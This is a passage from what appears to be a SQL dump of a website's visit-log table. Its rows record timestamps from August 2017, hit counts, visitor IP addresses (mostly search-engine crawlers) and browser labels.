29.198.25','other'),(141865,1501978751,1,1,0,0,'51.255.65.59','other'),(141866,1501978779,1,1,0,0,'51.255.65.71','other'),(141867,1501978849,1,1,0,0,'213.180.203.21','other'),(141868,1501979005,1,1,0,0,'95.108.181.52','other'),(141869,1501979138,1,1,0,0,'178.154.171.18','other'),(141870,1501979265,1,1,0,0,'5.45.207.64','other'),(141871,1501979781,1,1,0,0,'178.154.171.53','other'),(141872,1501980227,1,1,0,0,'95.108.181.52','other'),(141873,1501980746,1,1,0,0,'217.182.132.149','other'),(141874,1501980838,1,1,0,0,'217.182.132.187','other'),(141875,1501981568,1,1,0,0,'178.154.171.42','other'),(141876,1501981593,1,1,0,0,'178.154.171.59','other'),(141877,1501981644,1,1,0,0,'217.69.133.9','other'),(141878,1501981791,1,0,1,0,'66.249.66.157',''),(141879,1501981926,1,1,0,0,'37.9.113.94','other'),(141880,1501982705,1,1,0,0,'51.255.65.7','other'),(141881,1501982828,1,1,0,0,'217.182.132.33','other'),(141882,1501983042,1,1,0,0,'216.244.66.246','other'),(141883,1501983377,1,1,0,0,'178.154.171.3','other'),(141884,1501983737,1,1,0,0,'51.255.65.40','other'),(141885,1501984513,4,4,0,0,'216.244.66.194','other'),(141886,1501984563,1,1,0,0,'95.108.181.52','other'),(141887,1501985455,1,1,0,0,'46.161.9.39','chrome'),(141888,1501985800,1,1,0,0,'51.255.65.79','other'),(141889,1501985835,2,2,0,0,'216.244.66.246','other'),(141890,1501986053,1,1,0,0,'51.255.65.59','other'),(141891,1501986061,1,1,0,0,'217.182.132.33','other'),(141892,1501986194,1,1,0,0,'37.9.113.138','other'),(141893,1501986438,1,1,0,0,'66.249.66.76','chrome'),(141894,1501986633,1,1,0,0,'217.182.132.177','other'),(141895,1501986778,2,2,0,0,'66.249.66.155','chrome'),(141896,1501987312,1,1,0,0,'95.108.181.69','other'),(141897,1501987588,3,3,0,0,'216.244.66.246','other'),(141898,1501987766,1,1,0,0,'5.45.207.64','other'),(141899,1501988033,1,1,0,0,'66.249.66.155','chrome'),(141900,1501988370,1,1,0,0,'51.255.65.80','other'),(141901,1501988592,1,1,0,0,'217.182.132.83','other'),(141902,1501988901,1,1,0,0,'5.45.207.57','other'),(141903,1501989130,1,1,0,0,'213.180.203.32','other'),(141904,1501989293,1,1,0,0,'217.69.133.4','other'),(141905,1501989332,1,1,0,0,'8.29.198.26','other'),(141906,1501990309,1,1,0,0,'213.180.203.42','other'),(141907,1501990464,1,1,0,0,'213.180.203.43','other'),(141908,1501991673,1,0,1,0,'66.249.66.74',''),(141909,1501991695,1,1,0,0,'213.180.203.25','other'),(141910,1501991880,1,1,0,0,'173.208.173.138','other'),(141911,1501991896,1,1,0,0,'213.180.203.21','other'),(141912,1501992747,1,1,0,0,'217.69.133.3','other'),(141913,1501993377,1,1,0,0,'66.249.66.157','chrome'),(141914,1501993551,1,1,0,0,'95.108.181.58','other'),(141915,1501993601,1,1,0,0,'5.45.207.57','other'),(141916,1501994209,1,1,0,0,'95.108.181.60','other'),(141917,1501994621,1,1,0,0,'213.180.203.32','other'),(141918,1501994726,1,1,0,0,'213.180.203.21','other'),(141919,1501995060,1,1,0,0,'5.45.207.56','other'),(141920,1501995104,1,1,0,0,'46.42.173.243','chrome'),(141921,1501995110,1,1,0,0,'5.45.207.66','other'),(141922,1501995247,3,3,0,0,'216.244.66.194','other'),(141923,1501995459,1,1,0,0,'37.9.113.128','other'),(141924,1501995510,1,1,0,0,'213.180.203.18','other'),(141925,1501996157,1,1,0,0,'37.9.113.94','other'),(141926,1501996316,1,1,0,0,'178.154.171.18','other'),(141927,1501996467,1,1,0,0,'37.9.113.138','other'),(141928,1501996792,1,1,0,0,'95.108.181.57','other'),(141929,1501997157,1,1,0,0,'35.184.189.105','other'),(141930,1501997408,5,5,0,0,'216.244.66.246','other'),(141931,1501997650,1,1,0,0,'51.255.65.18','other'),(141932,1501997703,1,1,0,0,'51.255.65.22','other'),(141933,1501998303,1,1,0,0,'217.69.133.203','other'),(141934,1501998511,1,1,0,0,'51.255.71.123','other'),(141935,1501998903,1,1,0,0,'51.255.65.25','other'),(141936,1501999011,1,1,0,0,'217.182.132.240','other'),(141937,1501999569,1,1,0,0,'66.249.66.156','chrome'),(141938,1501999702,1,0,1,0,'66.249.66.155',''),(141939,1501999964,1,1,0,0,'51.255.65.85','other'),(141940,1502000162,1,1,0,0,'95.108.181.63','other'),(141941,1502000167,1,1,0,0,'8.29.198.27','other'),(141942,1502000372,1,1,0,0,'51.255.65.23','other'),(141943,1502000397,1,1,0,0,'217.182.132.29','other'),(141944,1502000575,1,1,0,0,'178.154.171.18','other'),(141945,1502000591,1,1,0,0,'5.45.207.56','other'),(141946,1502000686,1,1,0,0,'66.249.66.156','chrome'),(141947,1502000978,1,1,0,0,'51.255.65.88','other'),(141948,1502001153,1,1,0,0,'51.255.65.28','other'),(141949,1502001216,1,0,1,0,'66.249.66.76',''),(141950,1502001445,1,1,0,0,'95.108.181.60','other'),(141951,1502001524,1,0,1,0,'66.249.66.155',''),(141952,1502001543,1,1,0,0,'95.108.181.63','other'),(141953,1502001780,1,1,0,0,'213.180.203.25','other'),(141954,1502001882,1,1,0,0,'216.244.66.237','other'),(141955,1502002060,1,1,0,0,'51.255.65.13','other'),(141956,1502002364,1,1,0,0,'217.182.132.7','other'),(141957,1502002501,3,3,0,0,'216.244.66.194','other'),(141958,1502002586,1,1,0,0,'51.255.65.51','other'),(141959,1502002802,1,1,0,0,'95.108.181.57','other'),(141960,1502003122,1,1,0,0,'91.196.178.70','firefox'),(141961,1502003506,1,1,0,0,'51.255.65.224','other'),(141962,1502003904,1,1,0,0,'217.69.133.6','other'),(141963,1502004062,1,1,0,0,'217.182.132.179','other'),(141964,1502004183,1,1,0,0,'216.244.66.246','other'),(141965,1502004638,1,1,0,0,'137.74.207.120','other'),(141966,1502005046,1,0,1,0,'68.180.229.59',''),(141967,1502005299,1,1,0,0,'37.9.113.138','other'),(141968,1502005436,1,1,0,0,'51.255.71.123','other'),(141969,1502005483,1,1,0,0,'217.182.132.64','other'),(141970,1502005957,1,1,0,0,'51.255.71.133','other'),(141971,1502005965,1,1,0,0,'157.55.39.153','other'),(141972,1502006479,1,0,1,0,'66.249.66.156',''),(141973,1502008021,9,9,0,0,'216.244.66.246','other'),(141974,1502008064,1,1,0,0,'51.255.65.71','other'),(141975,1502008319,1,1,0,0,'91.196.178.163','chrome'),(141976,1502008642,1,1,0,0,'180.76.15.157','other'),(141977,1502008654,1,1,0,0,'95.108.181.57','other'),(141978,1502008952,10,10,0,0,'193.164.132.64','other'),(141979,1502009452,1,1,0,0,'51.255.65.47','other'),(141980,1502009518,1,1,0,0,'217.69.133.6','other'),(141981,1502010122,1,1,0,0,'95.108.181.57','other'),(141982,1502010373,1,1,0,0,'213.180.203.21','other'),(141983,1502010445,1,1,0,0,'66.249.66.76','chrome'),(141984,1502010742,1,1,0,0,'51.255.71.132','other'),(141985,1502010785,1,1,0,0,'5.45.207.66','other'),(141986,1502010997,1,1,0,0,'8.29.198.25','other'),(141987,1502011002,1,1,0,0,'217.182.132.150','other'),(141988,1502011057,1,1,0,0,'217.182.132.54','other'),(141989,1502011133,2,2,0,0,'66.249.66.155','chrome'),(141990,1502011294,1,1,0,0,'51.255.65.47','other'),(141991,1502011311,1,1,0,0,'51.255.65.91','other'),(141992,1502011483,1,1,0,0,'216.244.66.246','other'),(141993,1502011499,1,1,0,0,'217.182.132.15','other'),(141994,1502011638,1,0,1,0,'66.249.66.74',''),(141995,1502011767,1,1,0,0,'217.182.132.78','other'),(141996,1502011915,1,1,0,0,'217.182.132.7','other'),(141997,1502012161,1,1,0,0,'178.154.171.18','other'),(141998,1502012473,1,1,0,0,'95.108.181.57','other'),(141999,1502012654,1,0,1,0,'66.249.66.76',''),(142000,1502012712,1,1,0,0,'37.9.113.94','other'),(142001,1502012813,1,1,0,0,'51.255.71.129','other'),(142002,1502014279,1,1,0,0,'216.244.66.194','other'),(142003,1502014888,1,1,0,0,'51.255.65.67','other'),(142004,1502014986,6,6,0,0,'216.244.66.246','other'),(142005,1502015083,1,1,0,0,'217.69.133.5','other'),(142006,1502015431,1,1,0,0,'217.182.132.32','other'),(142007,1502015546,1,1,0,0,'178.154.171.18','other'),(142008,1502016067,1,1,0,0,'217.182.132.153','other'),(142009,1502016162,1,1,0,0,'5.45.207.64','other'),(142010,1502016166,1,1,0,0,'5.45.207.56','other'),(142011,1502016257,1,1,0,0,'213.180.203.25','other'),(142012,1502016326,1,1,0,0,'51.255.65.80','other'),(142013,1502016859,1,1,0,0,'173.208.173.138','other'),(142014,1502017591,1,1,0,0,'217.182.132.80','other'),(142015,1502017645,1,1,0,0,'5.45.207.64','other'),(142016,1502018412,1,1,0,0,'217.182.132.19','other'),(142017,1502018843,1,1,0,0,'51.255.65.65','other'),(142018,1502019127,1,1,0,0,'51.255.65.88','other'),(142019,1502019726,4,4,0,0,'216.244.66.246','other'),(142020,1502019816,1,1,0,0,'178.154.171.42','other'),(142021,1502019855,1,1,0,0,'51.255.71.118','other'),(142022,1502020141,1,1,0,0,'217.182.132.78','other'),(142023,1502020389,1,1,0,0,'66.102.9.29','chrome'),(142024,1502020435,1,1,0,0,'217.182.132.32','other'),(142025,1502020975,1,1,0,0,'207.46.13.109','other'),(142026,1502021204,1,1,0,0,'37.190.163.241','chrome'),(142027,1502021835,1,1,0,0,'8.29.198.25','other'),(142028,1502022262,1,1,0,0,'37.9.113.138','other'),(142029,1502022773,1,1,0,0,'37.190.163.241','chrome'),(142030,1502023280,1,1,0,0,'157.55.39.205','other'),(142031,1502023317,1,1,0,0,'95.108.181.69','other'),(142032,1502023370,1,1,0,0,'51.255.65.72','other'),(142033,1502024193,1,1,0,0,'157.55.39.205','other'),(142034,1502024341,1,1,0,0,'66.249.66.155','chrome'),(142035,1502024550,1,1,0,0,'213.180.203.21','other'),(142036,1502024606,1,1,0,0,'37.9.113.94','other'),(142037,1502024730,1,1,0,0,'91.196.178.39','chrome'),(142038,1502024814,3,3,0,0,'35.184.189.105','other'),(142039,1502025645,1,0,1,0,'66.249.66.156',''),(142040,1502025730,1,1,0,0,'178.92.170.96','chrome'),(142041,1502026391,1,1,0,0,'5.45.207.64','other'),(142042,1502026455,1,1,0,0,'66.249.66.155','chrome'),(142043,1502027100,1,1,0,0,'51.255.65.46','other'),(142044,1502027244,1,1,0,0,'217.182.132.58','other'),(142045,1502027712,1,0,1,0,'66.249.66.155',''),(142046,1502027987,1,1,0,0,'51.255.71.129','other'),(142047,1502028307,1,1,0,0,'51.255.65.55','other'),(142048,1502028467,1,1,0,0,'213.180.203.14','other'),(142049,1502028632,1,1,0,0,'217.182.132.74','other'),(142050,1502028655,1,1,0,0,'213.180.203.18','other'),(142051,1502028691,2,2,0,0,'217.69.133.3','other'),(142052,1502029233,1,0,1,0,'66.249.66.76',''),(142053,1502029258,1,1,0,0,'217.182.132.157','other'),(142054,1502029343,1,1,0,0,'217.182.132.82','other'),(142055,1502029570,1,1,0,0,'66.249.66.157','chrome'),(142056,1502029707,1,1,0,0,'66.249.66.155','chrome'),(142057,1502029765,1,1,0,0,'66.249.66.156','chrome'),(142058,1502029853,1,1,0,0,'51.255.65.92','other'),(142059,1502029912,1,1,0,0,'137.74.201.100','other'),(142060,1502029960,1,1,0,0,'51.255.65.18','other'),(142061,1502030216,1,1,0,0,'178.154.171.3','other'),(142062,1502030257,1,1,0,0,'95.108.181.69','other'),(142063,1502030690,1,1,0,0,'137.74.207.188','other'),(142064,1502030776,1,1,0,0,'217.182.132.61','other'),(142065,1502030995,1,1,0,0,'95.108.181.60','other'),(142066,1502031034,1,1,0,0,'180.76.15.25','other'),(142067,1502031093,1,1,0,0,'78.111.187.140','firefox'),(142068,1502031207,1,1,0,0,'217.182.132.36','other'),(142069,1502031428,1,1,0,0,'51.255.65.12','other'),(142070,1502031913,1,1,0,0,'217.69.133.3','other'),(142071,1502032668,1,1,0,0,'8.29.198.25','other'),(142072,1502032806,1,1,0,0,'5.45.207.56','other'),(142073,1502033149,1,1,0,0,'194.60.77.217','chrome'),(142074,1502033201,1,1,0,0,'51.255.65.61','other'),(142075,1502033242,1,1,0,0,'216.244.66.246','other'),(142076,1502033276,1,1,0,0,'91.196.178.35','chrome'),(142077,1502033767,1,1,0,0,'46.211.117.235','chrome'),(142078,1502034217,2,2,0,0,'216.244.66.194','other'),(142079,1502034410,1,1,0,0,'157.55.39.205','other'),(142080,1502034426,1,1,0,0,'217.69.133.5','other'),(142081,1502034482,1,1,0,0,'95.108.181.60','other'),(142082,1502034750,1,1,0,0,'137.74.207.161','other'),(142083,1502034780,2,2,0,0,'213.180.203.43','other'),(142084,1502034818,1,1,0,0,'217.182.132.53','other'),(142085,1502035499,1,0,1,0,'66.249.66.155',''),(142086,1502035889,1,1,0,0,'217.182.132.63','other'),(142087,1502036611,1,1,0,0,'51.255.65.85','other'),(142088,1502036821,1,1,0,0,'217.182.132.54','other'),(142089,1502036848,1,1,0,0,'51.255.65.80','other'),(142090,1502036945,1,1,0,0,'51.255.65.62','other'),(142091,1502037030,1,1,0,0,'5.45.207.83','other'),(142092,1502037207,1,1,0,0,'91.196.178.103','chrome'),(142093,1502037557,1,1,0,0,'217.69.133.203','other'),(142094,1502037914,7,7,0,0,'216.244.66.194','other'),(142095,1502038009,1,1,0,0,'95.108.181.57','other'),(142096,1502038057,1,1,0,0,'37.9.113.128','other'),(142097,1502038358,1,1,0,0,'217.182.132.193','other'),(142098,1502038390,1,1,0,0,'66.249.66.155','chrome'),(142099,1502038392,1,0,1,0,'66.249.66.75',''),(142100,1502038810,1,1,0,0,'216.244.66.237','other'),(142101,1502039840,1,1,0,0,'178.154.171.42','other'),(142102,1502040077,1,1,0,0,'213.180.203.43','other'),(142103,1502040235,1,1,0,0,'137.74.207.108','other'),(142104,1502040288,1,0,1,0,'66.249.66.74',''),(142105,1502040348,1,1,0,0,'51.255.65.79','other'),(142106,1502040630,1,1,0,0,'51.255.65.19','other'),(142107,1502040670,1,0,1,0,'66.249.66.156',''),(142108,1502041105,1,1,0,0,'213.180.203.42','other'),(142109,1502041248,4,4,0,0,'216.244.66.246','other'),(142110,1502041600,1,1,0,0,'164.132.162.157','other'),(142111,1502041865,1,1,0,0,'217.182.132.190','other'),(142112,1502041907,1,1,0,0,'217.182.132.187','other'),(142113,1502042095,2,2,0,0,'51.255.65.62','other'),(142114,1502042196,1,1,0,0,'178.92.170.96','chrome'),(142115,1502042314,1,1,0,0,'217.182.132.14','other'),(142116,1502042951,1,0,1,0,'66.249.66.157',''),(142117,1502043529,1,1,0,0,'8.29.198.26','other'),(142118,1502043641,1,1,0,0,'95.108.181.52','other'),(142119,1502044264,1,1,0,0,'51.255.65.22','other'),(142120,1502044288,1,1,0,0,'37.9.113.66','other'),(142121,1502044521,1,1,0,0,'66.249.66.156','chrome'),(142122,1502044803,1,1,0,0,'91.196.178.66','chrome'),(142123,1502044929,1,1,0,0,'95.108.181.69','other'),(142124,1502044933,1,1,0,0,'5.45.207.66','other'),(142125,1502045022,1,1,0,0,'95.108.181.58','other'),(142126,1502045292,1,1,0,0,'95.135.213.131','chrome'),(142127,1502045404,1,1,0,0,'51.255.65.80','other'),(142128,1502045824,1,1,0,0,'217.69.133.5','other'),(142129,1502045921,1,0,1,0,'66.249.66.157',''),(142130,1502045974,1,0,1,0,'66.249.66.156',''),(142131,1502046016,1,1,0,0,'95.108.181.69','other'),(142132,1502046260,1,1,0,0,'217.182.132.28','other'),(142133,1502046515,1,1,0,0,'217.69.133.3','other'),(142134,1502047417,1,1,0,0,'217.182.132.25','other'),(142135,1502047443,1,1,0,0,'51.255.65.56','other'),(142136,1502047764,1,0,1,0,'66.249.66.75',''),(142137,1502048248,1,1,0,0,'213.180.203.25','other'),(142138,1502048721,2,2,0,0,'216.244.66.246','other'),(142139,1502048964,1,1,0,0,'51.255.65.52','other'),(142140,1502049111,1,1,0,0,'217.182.132.187','other'),(142141,1502049153,1,1,0,0,'217.182.132.95','other'),(142142,1502049426,1,1,0,0,'217.182.132.81','other'),(142143,1502049547,1,1,0,0,'164.132.162.160','other'),(142144,1502049697,1,1,0,0,'82.145.222.3','chrome'),(142145,1502049921,5,5,0,0,'216.244.66.194','other'),(142146,1502050795,1,0,1,0,'66.249.66.157',''),(142147,1502051794,1,1,0,0,'176.98.23.39','chrome'),(142148,1502051833,1,1,0,0,'95.108.181.69','other'),(142149,1502051847,1,1,0,0,'37.115.109.129','chrome'),(142150,1502052248,1,1,0,0,'51.255.71.132','other'),(142151,1502052449,1,0,1,0,'66.249.66.156',''),(142152,1502052645,1,1,0,0,'178.154.171.42','other'),(142153,1502053438,2,2,0,0,'216.244.66.246','other'),(142154,1502053993,1,1,0,0,'213.180.203.21','other'),(142155,1502054262,1,0,1,0,'66.249.66.157',''),(142156,1502054375,1,1,0,0,'8.29.198.26','other'),(142157,1502054438,1,1,0,0,'51.255.65.3','other'),(142158,1502054915,1,1,0,0,'51.255.65.14','other'),(142159,1502055129,1,1,0,0,'173.208.173.138','other'),(142160,1502055152,5,5,0,0,'216.244.66.194','other'),(142161,1502055524,1,1,0,0,'51.255.65.34','other'),(142162,1502055544,1,1,0,0,'51.255.65.41','other'),(142163,1502055947,1,1,0,0,'178.154.171.53','other'),(142164,1502055960,1,1,0,0,'216.244.66.246','other'),(142165,1502056123,1,1,0,0,'51.255.65.86','other'),(142166,1502056240,1,1,0,0,'91.196.178.72','chrome'),(142167,1502056603,1,1,0,0,'213.180.203.43','other'),(142168,1502056942,1,1,0,0,'51.255.65.20','other'),(142169,1502057334,1,1,0,0,'137.74.207.110','other'),(142170,1502057338,2,0,2,0,'66.249.66.157',''),(142171,1502057588,1,1,0,0,'51.255.65.52','other'),(142172,1502058043,1,1,0,0,'217.182.132.156','other'),(142173,1502058126,1,1,0,0,'151.80.27.116','other'),(142174,1502058233,1,1,0,0,'217.182.132.6','other'),(142175,1502058512,1,1,0,0,'51.255.65.64','other'),(142176,1502058681,5,5,0,0,'216.244.66.246','other'),(142177,1502058716,1,1,0,0,'5.45.207.57','other'),(142178,1502058826,1,1,0,0,'217.182.132.61','other'),(142179,1502059017,1,1,0,0,'213.180.203.14','other'),(142180,1502059020,1,1,0,0,'95.108.181.57','other'),(142181,1502059063,1,1,0,0,'37.9.113.94','other'),(142182,1502059609,1,1,0,0,'95.108.181.52','other'),(142183,1502059764,1,1,0,0,'217.182.132.157','other'),(142184,1502060056,4,4,0,0,'216.244.66.194','other'),(142185,1502060068,1,1,0,0,'217.69.133.194','other'),(142186,1502060575,1,1,0,0,'5.45.207.66','other'),(142187,1502060742,1,1,0,0,'5.45.207.83','other'),(142188,1502061048,1,1,0,0,'95.108.181.57','other'),(142189,1502061134,1,1,0,0,'217.182.132.73','other'),(142190,1502061615,1,1,0,0,'51.255.65.43','other'),(142191,1502061746,1,1,0,0,'217.182.132.147','other'),(142192,1502062286,1,1,0,0,'213.180.203.43','other'),(142193,1502062553,1,1,0,0,'91.209.11.236','other'),(142194,1502062577,1,1,0,0,'217.182.132.52','other'),(142195,1502062619,1,1,0,0,'178.154.171.45','other'),(142196,1502063454,1,1,0,0,'51.255.65.41','other'),(142197,1502063954,1,1,0,0,'51.255.65.90','other'),(142198,1502063963,1,1,0,0,'91.209.11.236','other'),(142199,1502064195,2,2,0,0,'216.244.66.246','other'),(142200,1502064273,1,1,0,0,'51.255.65.23','other'),(142201,1502064669,1,1,0,0,'5.45.207.56','other'),(142202,1502065213,1,1,0,0,'8.29.198.27','other'),(142203,1502065265,1,1,0,0,'51.255.65.21','other'),(142204,1502065278,1,1,0,0,'51.255.71.121','other'),(142205,1502065606,1,1,0,0,'213.180.203.43','other'),(142206,1502066002,1,1,0,0,'5.45.207.83','other'),(142207,1502066065,1,1,0,0,'178.154.171.59','other'),(142208,1502066070,1,1,0,0,'95.108.181.57','other'),(142209,1502066748,1,1,0,0,'207.46.13.109','other'),(142210,1502067036,1,1,0,0,'37.9.113.66','other'),(142211,1502067195,8,8,0,0,'216.244.66.194','other'),(142212,1502067283,1,1,0,0,'217.182.132.55','other'),(142213,1502067911,1,1,0,0,'91.209.11.236','other'),(142214,1502068228,1,1,0,0,'51.255.65.31','other'),(142215,1502068561,1,1,0,0,'173.208.173.138','other'),(142216,1502068671,1,1,0,0,'137.74.207.116','other'),(142217,1502069218,6,6,0,0,'216.244.66.246','other'),(142218,1502069311,1,0,1,0,'66.249.66.76',''),(142219,1502069343,1,1,0,0,'217.182.132.153','other'),(142220,1502069764,1,1,0,0,'51.255.65.91','other'),(142221,1502069872,1,1,0,0,'5.45.207.56','other'),(142222,1502070045,1,1,0,0,'37.9.113.138','other'),(142223,1502070547,1,1,0,0,'217.182.132.86','other'),(142224,1502070668,1,1,0,0,'51.255.65.43','other'),(142225,1502071240,1,1,0,0,'217.69.133.194','other'),(142226,1502071248,1,1,0,0,'5.45.207.64','other'),(142227,1502071384,2,2,0,0,'95.108.181.60','other'),(142228,1502071523,1,1,0,0,'37.9.113.138','other'),(142229,1502071803,1,0,1,0,'66.249.66.155',''),(142230,1502071938,1,1,0,0,'178.95.66.169','chrome'),(142231,1502072296,1,1,0,0,'213.180.203.25','other'),(142232,1502072348,1,1,0,0,'66.249.66.155','chrome'),(142233,1502072375,1,1,0,0,'37.9.113.78','other'),(142234,1502072379,1,1,0,0,'5.45.207.57','other'),(142235,1502072382,1,1,0,0,'95.108.181.60','other'),(142236,1502072386,1,1,0,0,'95.108.181.52','other'),(142237,1502072389,1,1,0,0,'213.180.203.21','other'),(142238,1502072942,1,1,0,0,'217.182.132.52','other'),(142239,1502073104,1,1,0,0,'217.182.132.63','other'),(142240,1502073671,1,1,0,0,'37.9.113.138','other'),(142241,1502074024,2,2,0,0,'217.69.133.6','other'),(142242,1502074027,2,2,0,0,'217.69.133.4','other'),(142243,1502074301,1,1,0,0,'5.45.207.57','other'),(142244,1502074341,1,0,1,0,'66.249.66.156',''),(142245,1502074346,1,1,0,0,'173.208.173.138','other'),(142246,1502074411,1,0,1,0,'66.249.66.157',''),(142247,1502074493,1,1,0,0,'37.9.113.78','other'),(142248,1502074676,5,5,0,0,'216.244.66.246','other'),(142249,1502075287,1,1,0,0,'213.180.203.18','other'),(142250,1502075294,1,1,0,0,'217.182.132.90','other'),(142251,1502075475,1,1,0,0,'178.154.171.42','other'),(142252,1502075956,1,1,0,0,'217.182.132.28','other'),(142253,1502076038,1,1,0,0,'51.255.65.21','other'),(142254,1502076057,1,1,0,0,'8.29.198.25','other'),(142255,1502076167,1,0,1,0,'66.249.66.74',''),(142256,1502076254,1,1,0,0,'37.9.113.78','other'),(142257,1502076698,3,3,0,0,'216.244.66.194','other'),(142258,1502077272,1,1,0,0,'217.182.132.155','other'),(142259,1502077367,1,1,0,0,'37.9.113.128','other'),(142260,1502077902,1,1,0,0,'217.182.132.64','other'),(142261,1502077979,1,1,0,0,'207.46.13.109','other'),(142262,1502078057,1,0,1,0,'66.249.66.155',''),(142263,1502078124,1,0,1,0,'66.249.66.156',''),(142264,1502078307,1,1,0,0,'95.108.181.60','other'),(142265,1502078416,1,1,0,0,'137.74.207.101','other'),(142266,1502078535,1,1,0,0,'51.255.65.25','other'),(142267,1502078984,1,1,0,0,'217.182.132.92','other'),(142268,1502079125,1,1,0,0,'164.132.162.153','other'),(142269,1502079202,1,1,0,0,'91.196.178.161','chrome'),(142270,1502079209,1,1,0,0,'217.182.132.188','other'),(142271,1502079295,1,1,0,0,'5.45.207.57','other'),(142272,1502079395,1,1,0,0,'51.255.65.86','other'),(142273,1502079615,1,1,0,0,'217.182.132.175','other'),(142274,1502079643,1,1,0,0,'51.255.65.70','other'),(142275,1502080167,1,1,0,0,'213.180.203.25','other'),(142276,1502080251,1,1,0,0,'213.180.203.43','other'),(142277,1502080253,4,4,0,0,'216.244.66.246','other'),(142278,1502080745,1,1,0,0,'95.108.181.58','other'),(142279,1502080856,2,2,0,0,'95.213.141.126','opera'),(142280,1502081029,2,2,0,0,'162.210.196.98','other'),(142281,1502081166,1,0,1,0,'66.249.66.75',''),(142282,1502081350,1,1,0,0,'51.255.65.15','other'),(142283,1502081450,1,0,1,0,'66.249.66.157',''),(142284,1502081458,1,1,0,0,'91.196.178.70','firefox'),(142285,1502081609,1,1,0,0,'217.182.132.170','other'),(142286,1502081701,1,1,0,0,'51.255.71.112','other'),(142287,1502081707,1,1,0,0,'5.45.207.83','other'),(142288,1502081764,1,1,0,0,'157.55.39.205','other'),(142289,1502081782,1,1,0,0,'217.182.132.152','other'),(142290,1502082042,1,1,0,0,'95.108.181.60','other'),(142291,1502082222,1,0,1,0,'66.249.66.156',''),(142292,1502082248,1,1,0,0,'51.255.65.82','other'),(142293,1502082446,1,1,0,0,'217.69.133.5','other'),(142294,1502082451,1,1,0,0,'217.69.133.4','other'),(142295,1502082519,1,1,0,0,'178.154.171.59','other'),(142296,1502082860,1,1,0,0,'163.172.251.217','chrome'),(142297,1502082945,1,1,0,0,'95.108.181.58','other'),(142298,1502082948,1,1,0,0,'37.9.113.78','other'),(142299,1502082952,1,1,0,0,'95.108.181.60','other'),(142300,1502083065,1,1,0,0,'178.154.171.3','other'),(142301,1502083296,1,0,1,0,'66.249.66.155',''),(142302,1502084103,1,1,0,0,'217.182.132.178','other'),(142303,1502084245,1,1,0,0,'95.108.181.58','other'),(142304,1502084608,1,0,1,0,'68.180.229.59',''),(142305,1502084776,1,0,1,0,'66.249.66.155',''),(142306,1502085016,1,1,0,0,'95.108.181.63','other'),(142307,1502085077,1,1,0,0,'51.255.65.72','other'),(142308,1502085358,1,1,0,0,'217.69.133.6','other'),(142309,1502085447,1,1,0,0,'217.182.132.64','other'),(142310,1502085639,1,1,0,0,'193.200.212.133','chrome'),(142311,1502085686,1,1,0,0,'51.255.65.13','other'),(142312,1502085759,1,1,0,0,'213.180.203.25','other'),(142313,1502086061,1,0,1,0,'66.249.66.74',''),(142314,1502086111,1,0,1,0,'66.249.66.76',''),(142315,1502086156,1,1,0,0,'51.255.65.3','other'),(142316,1502086204,1,1,0,0,'91.196.178.69','chrome'),(142317,1502086261,1,1,0,0,'91.196.178.69','firefox'),(142318,1502086581,1,1,0,0,'91.196.148.202','chrome'),(142319,1502086631,4,4,0,0,'216.244.66.246','other'),(142320,1502086659,1,1,0,0,'51.255.71.119','other'),(142321,1502086668,6,6,0,0,'216.244.66.194','other'),(142322,1502086761,1,0,1,0,'66.249.66.156',''),(142323,1502086902,1,1,0,0,'8.29.198.26','other'),(142324,1502087069,1,1,0,0,'5.45.207.64','other'),(142325,1502087159,1,1,0,0,'217.182.132.7','other'),(142326,1502087224,1,1,0,0,'213.180.203.32','other'),(142327,1502087727,1,1,0,0,'46.201.175.91','firefox'),(142328,1502087758,1,1,0,0,'217.182.132.51','other'),(142329,1502087799,1,1,0,0,'91.196.178.69','chrome'),(142330,1502087886,1,1,0,0,'51.255.71.100','other'),(142331,1502088029,1,1,0,0,'217.69.133.2','other'),(142332,1502088274,1,1,0,0,'66.102.9.25','chrome'),(142333,1502088297,1,1,0,0,'91.196.178.71','chrome'),(142334,1502088395,1,1,0,0,'178.154.171.53','other'),(142335,1502088406,1,1,0,0,'91.196.178.71','firefox'),(142336,1502088865,1,0,1,0,'66.249.66.75',''),(142337,1502089301,1,1,0,0,'178.154.171.18','other'),(142338,1502089314,1,1,0,0,'37.9.113.138','other'),(142339,1502089552,1,1,0,0,'213.180.203.42','other'),(142340,1502089608,1,1,0,0,'51.255.65.6','other'),(142341,1502089623,1,0,1,0,'66.249.66.157',''),(142342,1502089630,1,0,1,0,'66.249.66.156',''),(142343,1502089734,1,0,1,0,'66.249.66.155',''),(142344,1502089745,20,20,0,0,'198.204.243.138','other'),(142345,1502089787,1,1,0,0,'213.180.203.25','other'),(142346,1502090233,3,3,0,0,'216.244.66.246','other'),(142347,1502090400,1,1,0,0,'91.196.178.69','chrome'),(142348,1502090424,1,1,0,0,'217.182.132.14','other'),(142349,1502090790,1,1,0,0,'217.182.132.7','other'),(142350,1502090947,1,1,0,0,'217.182.132.183','other'),(142351,1502090969,1,1,0,0,'157.55.39.205','other'),(142352,1502090993,1,1,0,0,'217.69.133.4','other'),(142353,1502091159,1,1,0,0,'137.74.207.109','other'),(142354,1502091160,1,1,0,0,'51.255.71.122','other'),(142355,1502091213,1,1,0,0,'188.166.83.18','chrome'),(142356,1502091427,2,2,0,0,'91.196.178.69','chrome'),(142357,1502091786,1,1,0,0,'217.69.133.3','other'),(142358,1502091824,1,0,1,0,'68.180.229.59',''),(142359,1502092182,1,1,0,0,'185.138.228.27','chrome'),(142360,1502092209,1,1,0,0,'91.196.178.71','firefox'),(142361,1502092860,1,1,0,0,'66.249.66.75','chrome'),(142362,1502092915,1,1,0,0,'137.74.207.101','other'),(142363,1502092970,1,1,0,0,'66.249.66.155','chrome'),(142364,1502092983,1,1,0,0,'217.182.132.22','other'),(142365,1502093040,1,1,0,0,'51.255.65.31','other'),(142366,1502093132,1,1,0,0,'66.249.66.156','chrome'),(142367,1502093254,1,1,0,0,'217.182.132.87','other'),(142368,1502093354,1,1,0,0,'216.244.66.246','other'),(142369,1502093819,1,1,0,0,'91.196.178.71','chrome'),(142370,1502093868,1,1,0,0,'37.9.113.66','other'),(142371,1502093872,1,1,0,0,'95.108.181.58','other'),(142372,1502093876,1,1,0,0,'37.9.113.128','other'),(142373,1502093879,1,1,0,0,'5.45.207.83','other'),(142374,1502093906,6,6,0,0,'216.244.66.194','other'),(142375,1502093946,1,1,0,0,'51.255.65.32','other'),(142376,1502093990,1,1,0,0,'217.182.132.148','other'),(142377,1502094216,1,1,0,0,'51.255.65.34','other'),(142378,1502094487,1,1,0,0,'91.196.178.69','chrome'),(142379,1502094726,